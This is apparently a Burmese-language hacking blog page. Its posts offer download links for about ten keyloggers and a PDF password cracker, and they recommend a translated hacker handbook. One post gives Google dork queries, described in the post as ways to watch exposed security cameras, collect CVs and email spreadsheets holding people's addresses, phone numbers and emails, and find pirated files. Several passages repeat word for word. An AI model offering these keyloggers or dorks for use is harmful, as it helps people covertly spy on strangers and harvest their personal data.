[[340869882605657]] = K
[[330554750305956]] = L
[[329961400365132]] = M
[[158558324248717]] = N
[[347010495314863]] = O
[[267188070003737]] = P
[[248037205261849]] = Q
[[294252217292321]] = R
[[269636683095081]] = S
[[276867469029912]] = T
[[334919309870510]] = U
[[331041810248882]] = V
[[206218662800583]] = W
[[244960698906593]] = X
[[120548588062562]] = Y
[[336009086426836]] = Z
SECOND COLOR TEXT SET:
[[107015582669715]] = A
[[116067591741123]] = B
[[115602405121532]] = C
[[112542438763744]] = D
[[115430438474268]] = E
[[109225112442557]] = F
[[111532845537326]] = G
[[111356865552629]] = H
[[109294689102123]] = I
[[126362660720793]] = J
[[116651741681944]] = K
[[115807951764667]] = L
[[106596672714242]] = M
[[108634132504932]] = N
[[116564658357124]] = O
[[111669128857397]] = P
[[107061805996548]] = Q
[[106699962703083]] = R
[[115927268419031]] = S
[[112669162092780]] = T
[[108983579135532]] = U
[[107023745999320]] = V
[[106678406038354]] = W
[[116740548336581]] = X
[[112416755444217]] = Y
[[165724910215]] = Z
Labels:
Facebook Knowledge
Keylogger Collection........Download
7:49 AM
Keylogger softwares ေလးေတြပါ.....မိမိျကိဳက္ရာေဒါင္းႏိူင္ပါတယ္........
Ardamax Keylogger :
Download
2.Advanced Mach7 Remote Spy Keylogger:
Download
3.Accuracy Logger:
Download
4.Award Keylogger:
Download
5.Cyb3r K3yl0gg3r:
Download
6.Dark Keylogger:
Download
7.Ecodsoft Keylogger:
Download
8.Elite Keylogger:
Download
Download
Ardamax Keylogger :
Download
2.Advanced Mach7 Remote Spy Keylogger:
Download
3.Accuracy Logger:
Download
4.Award Keylogger:
Download
5.Cyb3r K3yl0gg3r:
Download
6.Dark Keylogger:
Download
7.Ecodsoft Keylogger:
Download
8.Elite Keylogger:
Download
9.Family Keylogger:
Download
10.Golden Eye Keylogger:
Download
Labels:
Keyloggers
Advanced PDF Password Recovery
9:27 PM
PDF password ကိုrecoveryလုပ္ေပးတဲ့softwareေလးပါ......
Download
Download
Labels:
Cracking
DDos Attack Tracer
5:12 AM
ဒါေလးကေတာ့ddos tracer software...ေလးပါသူ့ကိုrun Microsoft.Net Frame လိုအပ္ပါတယ္.....
Labels:
Hacking Tools
Every day Internet(မ်ိဳးသူရ)
7:14 AM
ေန့စဥ္သံုးအင္တာနက္စာအုပ္ေလးပါ....ဒီစာအုပ္မွာ....gmail account ေလ်ာက္နည္း၊အီးေမးလ္ပို့နည္း၊chatting ေျပာနည္း...
..အစ၇ိွတဲ့အင္တာနက္နဲ့ပတ္သက္တဲ့အေျကာင္းေလးေတြကိုေရးထားပါတယ္...ကိုမ်ိဳးသူရေရးတာပါ.
Download
Download
Source:http://www.onekokoaung.co.cc/2012/04/e-book.html
..အစ၇ိွတဲ့အင္တာနက္နဲ့ပတ္သက္တဲ့အေျကာင္းေလးေတြကိုေရးထားပါတယ္...ကိုမ်ိဳးသူရေရးတာပါ.
Download
Download
Source:http://www.onekokoaung.co.cc/2012/04/e-book.html
Labels:
Ebooks
Hacker Underground Handbook (ျမန္မာလို)
7:05 AM
Hacker Underground Handbookလက္စြဲစာအုပ္ေလးပါ....ျမန္မာလိုဘာသာျပန္ထားပါတယ္....
Download
Download
Source:http://www.onekokoaung.co.cc/2012/02/e-book_22.html
Download
Download
Source:http://www.onekokoaung.co.cc/2012/02/e-book_22.html
Labels:
Ebooks
Download Glass Notepad for your Windows
2:16 AM
Glass notepad softwareဟာဆိုရင္ graphic ဒီဇိုင္းပိုင္းေကာင္းမြန္တဲ့applicationေလးပဲျဖစ္ပါတယ္သူ့ရဲ့functionေတြကေတာ့ Window xpမွာပါတဲ့notepadနဲ့အတူတူပဲျဖစ္ပါတယ္.ဒီsoftwareကအဆင့္ျမင့္တဲ့အတြက္.Windows vista and window 7မွာသာသံဳးလို့ရပါလိမ့္မယ္...........
Download
Download
Labels:
softwares
Bat To Exe Converter Free Download
9:36 PM
Bat to Exeေျပာင္းတဲ့converterေလးပါ.......bat ဖိုင္ေတြကိုexe fileအျဖစ္ေျပာင္းလဲလုိ့ရပါတယ္.......
Download
Download
Hack Using Google |New 2012 |Learn Hacking
5:08 AM
New 2012google dork code ေလးေတြပါ.ဒီdorkေတြကိုကူးျပီးgoogle searchထဲမွာ၇ွာလိုက္ပါ.ဒါဆို၇င္လင့္ေတြကိုေတြ့ပါလိမ့္မယ္အဲဒီကေနမိမိျကိဳက္တာကိုနိွပ္ျပီး.
hackingလုပ္ႏိူင္ပါတယ္.
1. Hacking Security Cameras :
Google dork:inurl:”viewerframe?mode=motion”
Google dork:intitle:”Live View / – AXIS”
google ထဲမွာ၇ိုက္ထည့္ျပီးလင့္ေတြတက္လာရင္မိမိျကိဳက္တာကိုႏိွပ္ျပီး.CAMERAတက္ထားတဲ့ေန၇ာေတြ
ကိုျကည့္ႏိူင္ပါတယ္
2. Hacking Personal and Confidential Documents
Google dork:intitle:”curriculum vitae” “phone * * *” “address *” “e-mail”
Google dork:filetype:xls inurl:”email.xls”
ဒါေလးကေတာ့လိပ္စာ၊အီးေမး၊ဖုန္းရယ္ဘယ္ႏိူင္ငံကဆိုတာကိုpdfဖိုင္အေနနဲ့ေဖာ္ျပေပးပါတယ္.
3. Hacking Google to gain access to Free Stuffs
Google dork:“?intitle:index.of?mp3 eminem“
ဒီကုဒ္ကေတာ့သီခ်င္း၇ွာခ်င္ရင္သံုးတဲ့နည္းလမ္းေလးပါ.သူကေတာ့မိမိ၇ိုက္ထည့္လိုက္တဲ့အဆိုေတာ္ရဲ့သီခ်င္း
listေတြကိုေဖာ္ျပေပးျပီးေဒါင္းလြတ္ဆြဲႏိူင္ပါတယ္..... အနီနဲ့ျပထားတဲ့ေနရာမွာမိမိျကိဳက္တဲ့အဆိုေတာ္နာမည္ကိုထည့္ျပီးေဒါင္းနိူင္ပါတယ္...........
mp3ေနရာမွာလည္း“pdf” or “zip” or “rar”.ေျပာင္းေရးျပီးေဒါင္းနိူင္ပါတယ္.
hackingလုပ္ႏိူင္ပါတယ္.
1. Hacking Security Cameras :
Google dork:inurl:”viewerframe?mode=motion”
Google dork:intitle:”Live View / – AXIS”
google ထဲမွာ၇ိုက္ထည့္ျပီးလင့္ေတြတက္လာရင္မိမိျကိဳက္တာကိုႏိွပ္ျပီး.CAMERAတက္ထားတဲ့ေန၇ာေတြ
ကိုျကည့္ႏိူင္ပါတယ္
2. Hacking Personal and Confidential Documents
Google dork:intitle:”curriculum vitae” “phone * * *” “address *” “e-mail”
Google dork:filetype:xls inurl:”email.xls”
ဒါေလးကေတာ့လိပ္စာ၊အီးေမး၊ဖုန္းရယ္ဘယ္ႏိူင္ငံကဆိုတာကိုpdfဖိုင္အေနနဲ့ေဖာ္ျပေပးပါတယ္.
3. Hacking Google to gain access to Free Stuffs
Google dork:“?intitle:index.of?mp3 eminem“
ဒီကုဒ္ကေတာ့သီခ်င္း၇ွာခ်င္ရင္သံုးတဲ့နည္းလမ္းေလးပါ.သူကေတာ့မိမိ၇ိုက္ထည့္လိုက္တဲ့အဆိုေတာ္ရဲ့သီခ်င္း
listေတြကိုေဖာ္ျပေပးျပီးေဒါင္းလြတ္ဆြဲႏိူင္ပါတယ္..... အနီနဲ့ျပထားတဲ့ေနရာမွာမိမိျကိဳက္တဲ့အဆိုေတာ္နာမည္ကိုထည့္ျပီးေဒါင္းနိူင္ပါတယ္...........
mp3ေနရာမွာလည္း“pdf” or “zip” or “rar”.ေျပာင္းေရးျပီးေဒါင္းနိူင္ပါတယ္.
Labels:
Google Dork,
Google hacking,
Web Hacking
Subscribe to:
Posts (Atom)